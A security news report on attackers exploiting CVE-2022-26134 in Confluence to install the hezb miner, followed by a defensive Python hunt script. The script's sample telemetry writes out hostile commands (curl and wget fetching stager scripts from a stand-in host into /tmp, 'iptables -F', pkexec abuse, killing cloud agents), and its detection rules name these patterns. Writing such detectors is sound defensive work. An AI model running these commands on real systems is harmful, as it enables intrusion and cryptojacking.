Hackers targeting unpatched Atlassian Confluence servers to deploy crypto-miners


A now-patched critical security flaw affecting Atlassian Confluence Server that was disclosed a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.

“If not patched and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as complete domain takeover of infrastructure and deployment of information stealers, remote access Trojans (RATs) and ransomware,” Trend Micro threat researcher Sunil Bharti said in a report.

The flaw, tracked as CVE-2022-26134 (CVSS score: 9.8), was patched by the Australian software company in June 2022.


In one of the infection chains observed by the cybersecurity firm, the flaw was exploited to download and execute a shell script (“ro.sh”) on the victim’s machine, which in turn retrieved a second shell script (“ap.sh”).

The malicious code is designed to update the PATH variable to include additional directories such as “/tmp”, download the cURL utility from a remote server if it is not already present, disable the iptables firewall, abuse the PwnKit flaw (CVE-2021-4034) to gain root privileges and ultimately deploy the hezb crypto-miner.

Like other cryptojacking attacks, the shell script also terminates competing coin miners and disables the monitoring agents of cloud service providers Alibaba and Tencent before attempting lateral movement via SSH.

The findings mirror similar mining attempts previously disclosed by Lacework, Microsoft, Sophos and Akamai in June.


Lacework’s analysis further shows that the command-and-control (C2) server used to fetch the cURL binary and the hezb miner also distributed a Golang-based ELF binary named “kik”, which the malware uses to kill processes of interest.
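The behaviours reported above (a Confluence JVM spawning a shell or downloader, staging scripts in /tmp, flushing iptables, invoking pkexec from the service account, killing cloud agents, and running the hezb and kik payloads) can be turned into a simple hunt over process-execution telemetry. The following script is an added example for defenders and is not code from Trend Micro, Lacework or the article; the log line format, the 203.0.113.10 address, the cloud-agent name substrings and the "three distinct rules" threshold are assumptions made for the demonstration.

```python
"""Hunt for the Confluence cryptojacking chain described in the article.

Events are constructed process-execution records in a hypothetical format:
  <timestamp> parent=<parent exe> user=<account> cmd="<command line>"
A real deployment would feed auditd/EDR process events through parse_event().
"""
import re
from typing import Callable, Dict, List, Optional

# Constructed sample telemetry (not real data). File names ro.sh, ap.sh, hezb
# and kik come from the article; 203.0.113.10 is a documentation-only address.
SAMPLE_EVENTS = [
    '2022-08-21T10:15:02Z parent=java user=confluence cmd="sh -c curl -s http://203.0.113.10/ro.sh -o /tmp/ro.sh"',
    '2022-08-21T10:15:03Z parent=sh user=confluence cmd="sh /tmp/ro.sh"',
    '2022-08-21T10:15:04Z parent=sh user=confluence cmd="wget http://203.0.113.10/ap.sh -O /tmp/ap.sh"',
    '2022-08-21T10:15:05Z parent=sh user=confluence cmd="iptables -F"',
    '2022-08-21T10:15:06Z parent=sh user=confluence cmd="pkexec /tmp/ap.sh"',
    '2022-08-21T10:15:07Z parent=sh user=root cmd="pkill -f aliyun"',
    '2022-08-21T10:15:08Z parent=sh user=root cmd="/tmp/hezb"',
    '2022-08-21T10:15:09Z parent=sh user=root cmd="/tmp/kik"',
    # Benign noise: normal JVM child and an admin health check.
    '2022-08-21T10:20:00Z parent=java user=confluence cmd="/usr/bin/java -version"',
    '2022-08-21T10:21:00Z parent=bash user=admin cmd="curl -s https://example.org/health"',
]

EVENT_RE = re.compile(r'^(?P<ts>\S+) parent=(?P<parent>\S+) user=(?P<user>\S+) cmd="(?P<cmd>.*)"$')


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Return the event fields, or None for lines that do not match the format."""
    m = EVENT_RE.match(line.strip())
    return m.groupdict() if m else None


def _exe(ev: Dict[str, str]) -> str:
    """Basename of the first argv token ("sh -c ..." -> "sh", "/tmp/hezb" -> "hezb")."""
    parts = ev["cmd"].split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""


# Confluence runs inside the JVM; it has no business spawning shells or downloaders.
def rule_webapp_spawns_shell(ev: Dict[str, str]) -> bool:
    return ev["parent"] == "java" and _exe(ev) in {"sh", "bash", "curl", "wget"}


# The stager scripts named in the article, written to or run from /tmp.
def rule_stager_in_tmp(ev: Dict[str, str]) -> bool:
    return re.search(r"/tmp/(ro|ap)\.sh\b", ev["cmd"]) is not None


# Flushing or stopping the host firewall.
def rule_firewall_disabled(ev: Dict[str, str]) -> bool:
    cmd = ev["cmd"]
    return "iptables" in cmd and re.search(r"\s-F\b|\bstop\b|\bdisable\b", cmd) is not None


# pkexec launched by a non-root service account is the PwnKit (CVE-2021-4034) pattern.
def rule_pkexec_from_service_account(ev: Dict[str, str]) -> bool:
    return _exe(ev) == "pkexec" and ev["user"] != "root"


# The miner and the process-killer binary named in the article.
def rule_known_payload_names(ev: Dict[str, str]) -> bool:
    return re.search(r"/(hezb|kik)\b", ev["cmd"]) is not None


# Kill commands aimed at cloud-provider agents. The substrings are assumptions;
# real agent process names differ per provider and version.
def rule_cloud_agent_killed(ev: Dict[str, str]) -> bool:
    cmd = ev["cmd"]
    return (re.search(r"\b(pkill|killall|kill)\b", cmd) is not None
            and re.search(r"aliyun|alibaba|tencent", cmd, re.I) is not None)


RULES: List[Callable[[Dict[str, str]], bool]] = [
    rule_webapp_spawns_shell, rule_stager_in_tmp, rule_firewall_disabled,
    rule_pkexec_from_service_account, rule_known_payload_names, rule_cloud_agent_killed,
]


def hunt(lines: List[str]) -> Dict[str, List[str]]:
    """Map each triggered rule name to the timestamps of the events that fired it."""
    hits: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for rule in RULES:
            if rule(ev):
                hits.setdefault(rule.__name__, []).append(ev["ts"])
    return hits


def verdict(hits: Dict[str, List[str]], threshold: int = 3) -> str:
    """A single rule is noisy; several distinct stages together are the chain."""
    if len(hits) >= threshold:
        return "probable Confluence cryptojacking chain"
    return "no conclusive chain"


if __name__ == "__main__":
    found = hunt(SAMPLE_EVENTS)
    for name, stamps in found.items():
        print(f"{name}: {len(stamps)} event(s), first at {stamps[0]}")
    print(verdict(found))
```

The rules deliberately key on stage behaviours rather than on the C2 address, since an attacker can change infrastructure far more cheaply than the sequence "JVM spawns downloader, stager in /tmp, firewall off, privilege escalation, miner". Requiring several distinct rules before raising a verdict keeps a lone `iptables -F` run by an administrator from paging anyone.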

Users are advised to prioritize patching the flaw, as it could be exploited by malicious actors for other nefarious purposes.

“Attackers could take advantage of injecting their own code for interpretation and access to the targeted Confluence domain, as well as carrying out attacks ranging from controlling the server for subsequent malicious activity to damaging the infrastructure itself,” Bharti said.
